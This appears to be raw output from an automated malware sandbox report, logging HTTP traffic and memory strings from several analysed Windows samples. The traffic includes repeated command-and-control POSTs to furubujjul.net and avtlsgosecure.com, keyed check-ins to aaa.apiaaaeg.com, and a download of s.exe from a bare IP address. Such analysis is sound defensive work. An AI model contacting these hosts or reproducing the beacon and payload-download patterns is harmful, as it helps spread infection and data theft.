Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pyqxykfbyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egupm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ypsqcei.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: furubujjul.net
Source: global traffic	HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.174.137.174
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gayxc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jnwjh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqnukffkf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njomtuqes.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bcubynupij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xeebbali.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygjlvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdviimuy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: furubujjul.net
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST /check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqxsaedljj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST /check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpnkx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://clcjalto.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://grafs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhlyfpb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnnnraawcb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkheots.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pakvlb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyftrqq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avqnngwqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkavdryu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewgonaqm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yuvwvqgqwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tekxbw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST /check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aae HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST /check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf6030 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vwbkimlhg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksedxblf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvenxtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wxsohsstcq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yclscqegh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcxytihxr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btqtaywr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xixace.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST /check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b2 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umtcicl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: avtlsgosecure.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfdgvxgb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: avtlsgosecure.com

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDWEBMANAGE-EUGB CLOUDWEBMANAGE-EUGB

Source: Joe Sandbox View	IP Address: 104.21.93.30 104.21.93.30
Source: Joe Sandbox View	IP Address: 104.21.93.30 104.21.93.30

Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559703582.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566523088.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.coaa.apiaaaeg.com/
Source: 8C19.exe, 0000000A.00000003.538167010.00000000023CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/
Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad
Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad1
Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad6
Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adg
Source: 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a
Source: 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3aal
Source: 8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3ag
Source: 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3awal
Source: 6246.exe, 00000008.00000003.533650856.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 6246.exe, 00000008.00000003.534943430.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.538648830.000000000087C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000F.00000002.498010000.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.494090495.0000000000910000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://furubujjul.net/
Source: explorer.exe, 0000000F.00000002.498010000.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.494090495.0000000000910000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://furubujjul.net/Mozilla/5.0
Source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000001.00000000.367799571.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.319113552.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.403304956.0000000000921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 956C.tmp.14.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/fo
Source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json1
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonE=
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonI
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondll.
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsong
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json~
Source: 956C.tmp.14.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 956C.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 956C.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 956C.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://messenger.com/
Source: 956C.tmp.14.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 956C.tmp.14.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 956C.tmp.14.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 956C.tmp.14.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/
Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/TT
Source: 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/ninstagram.
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/_LkNZPqGRAz.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0
Source: 8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/lwJdNrJ0mJk.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/_S6bZc2Nrqz.js?_nc_x=Ij3Wp8lg5Kz
